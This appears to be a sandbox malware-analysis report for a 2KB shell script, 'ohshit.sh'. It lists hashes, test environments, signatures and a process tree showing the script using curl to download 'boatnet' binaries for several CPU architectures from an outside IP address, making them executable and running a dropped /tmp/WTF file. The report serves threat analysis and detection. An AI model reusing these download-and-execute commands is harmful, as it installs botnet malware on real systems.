Analysis
- max time kernel: 60s
- max time network: 63s
- platform: debian-12_armhf
- resource: debian12-armhf-20240418-en
- resource tags: arch:armhf, image:debian12-armhf-20240418-en, kernel:6.1.0-17-armmp-lpae, locale:en-us, os:debian-12-armhf, system
- submitted: 31-08-2024 21:05
Static task
- static1
Behavioral tasks
- behavioral1: sample ohshit.sh, resource debian12-armhf-20240418-en
- behavioral2: sample ohshit.sh, resource debian12-mipsel-20240729-en
- behavioral3: sample ohshit.sh, resource debian9-armhf-20240611-en
- behavioral4: sample ohshit.sh, resource debian9-mipsbe-20240611-en
- behavioral5: sample ohshit.sh, resource debian9-mipsel-20240611-en
- behavioral6: sample ohshit.sh, resource ubuntu1804-amd64-20240508-en
- behavioral7: sample ohshit.sh, resource ubuntu2004-amd64-20240729-en
- behavioral8: sample ohshit.sh, resource ubuntu2204-amd64-20240611-en
General
- Target: ohshit.sh
- Size: 2KB
- MD5: fefdf2b7ece4d55bd47778b420f84011
- SHA1: 2823096e0538910f9b57ff9bae007ec655520fc3
- SHA256: 3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
- SHA512: b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures
- Executes dropped EXE (6 IoCs)
  ioc /tmp/WTF, pid 757, process WTF
  ioc /tmp/WTF, pid 771, process WTF
  ioc /tmp/WTF, pid 777, process WTF
  ioc /tmp/WTF, pid 783, process WTF
  ioc /tmp/WTF, pid 788, process WTF
  ioc /tmp/WTF, pid 793, process WTF
- yara_rule: upx (resource behavioral1/files/fstream-1.dat)
- Checks CPU configuration (1 TTP, 7 IoCs)
  Checks CPU information that indicates whether the system is a virtual machine.
  File opened for reading /proc/cpuinfo, process curl (7 occurrences)
- Writes file to tmp directory (8 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification /tmp/boatnet.mips, process curl
  File opened for modification /tmp/boatnet.arc, process curl
  File opened for modification /tmp/boatnet.i468, process curl
  File opened for modification /tmp/boatnet.i686, process curl
  File opened for modification /tmp/boatnet.x86_64, process curl
  File opened for modification /tmp/boatnet.mpsl, process curl
  File opened for modification /tmp/boatnet.x86, process curl
  File opened for modification /tmp/WTF, process ohshit.sh
Processes
- /tmp/ohshit.sh (PID 700), cmdline: /tmp/ohshit.sh
  signatures: Writes file to tmp directory
  - /usr/bin/curl (PID 706), cmdline: curl -O http://94.156.71.225/hiddenbin/boatnet.x86
    signatures: Checks CPU configuration; Writes file to tmp directory
  - /usr/bin/cat (PID 755), cmdline: cat boatnet.x86
  - /usr/bin/chmod (PID 756), cmdline: chmod +x boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-timedated.service-qtJorK WTF
  - /tmp/WTF (PID 757), cmdline: ./WTF
    signatures: Executes dropped EXE
  - /usr/bin/curl (PID 761), cmdline: curl -O http://94.156.71.225/hiddenbin/boatnet.mips
    signatures: Checks CPU configuration; Writes file to tmp directory
  - /usr/bin/cat (PID 769), cmdline: cat boatnet.mips
  - /usr/bin/chmod (PID 770), cmdline: chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
  - /tmp/WTF (PID 771), cmdline: ./WTF
    signatures: Executes dropped EXE
  - /usr/bin/curl (PID 774), cmdline: curl -O http://94.156.71.225/hiddenbin/boatnet.arc
    signatures: Checks CPU configuration; Writes file to tmp directory
  - /usr/bin/cat (PID 775), cmdline: cat boatnet.arc
  - /usr/bin/chmod (PID 776), cmdline: chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
  - /tmp/WTF (PID 777), cmdline: ./WTF
    signatures: Executes dropped EXE
  - /usr/bin/curl (PID 780), cmdline: curl -O http://94.156.71.225/hiddenbin/boatnet.i468
    signatures: Checks CPU configuration; Writes file to tmp directory
  - /usr/bin/cat (PID 781), cmdline: cat boatnet.i468
  - /usr/bin/chmod (PID 782), cmdline: chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
  - /tmp/WTF (PID 783), cmdline: ./WTF
    signatures: Executes dropped EXE
  - /usr/bin/curl (PID 785), cmdline: curl -O http://94.156.71.225/hiddenbin/boatnet.i686
    signatures: Checks CPU configuration; Writes file to tmp directory
  - /usr/bin/cat (PID 786), cmdline: cat boatnet.i686
  - /usr/bin/chmod (PID 787), cmdline: chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
  - /tmp/WTF (PID 788), cmdline: ./WTF
    signatures: Executes dropped EXE
  - /usr/bin/curl (PID 790), cmdline: curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64
    signatures: Checks CPU configuration; Writes file to tmp directory
  - /usr/bin/cat (PID 791), cmdline: cat boatnet.x86_64
  - /usr/bin/chmod (PID 792), cmdline: chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF
  - /tmp/WTF (PID 793), cmdline: ./WTF
    signatures: Executes dropped EXE
  - /usr/bin/curl (PID 796), cmdline: curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl
    signatures: Checks CPU configuration; Writes file to tmp directory
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 36KB
- MD5: ba2cb5b8715ba94c39e24e75a34d0ea0
- SHA1: 7182bf3b0e14e5224e741c15174c6e93f00df444
- SHA256: 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
- SHA512: 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d